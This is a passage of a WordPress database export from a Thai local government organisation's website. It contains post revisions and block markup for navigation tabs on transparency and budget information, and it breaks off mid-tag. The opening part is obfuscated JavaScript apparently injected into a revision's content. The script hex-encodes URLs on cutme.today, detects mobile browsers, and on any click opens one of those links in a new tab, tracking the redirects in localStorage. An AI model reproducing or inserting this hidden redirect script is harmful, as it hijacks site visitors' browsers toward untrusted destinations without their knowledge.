_0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โครงการซ้อมแผนปฏิบัติการป้องกันและบรรเทาสาธารณะภัย ประจำปีงบประมาณ 2567','','inherit','closed','closed','','905-revision-v1','','','2024-08-20 12:03:21','2024-08-20 05:03:21','',905,'http://pakhaeng.ssk.in.th/?p=1000',0,'revision','',0),
(1001,1,'2024-08-20 12:53:22','2024-08-20 05:53:22','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b37671-e5\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b37671-e5\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_317e6f-33\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_317e6f-33\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" 